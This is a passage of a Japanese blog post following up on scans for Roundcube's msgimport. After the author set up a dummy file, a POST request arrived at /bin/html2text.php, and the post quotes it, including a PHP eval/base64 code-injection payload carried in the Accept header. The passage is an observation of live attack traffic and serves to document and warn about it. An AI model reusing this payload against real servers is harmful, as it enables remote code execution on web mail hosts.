昨日書いた記事の続報なんですが、機械的にGETのリクエストでmsgimport探しているだけ(無ければ404になるだけ)なのでほっといたんですが、思い立ってダミーでmsgimport作ってみたらPOSTリクエストが来ました。 POST /bin/html2text.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Host: 内緒w (中略) <b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>SANS記事からたどっていったところ(http://trac.roundcube.net/ticket/1485618)のコメント欄と同じ感じですね。 まーSQLイ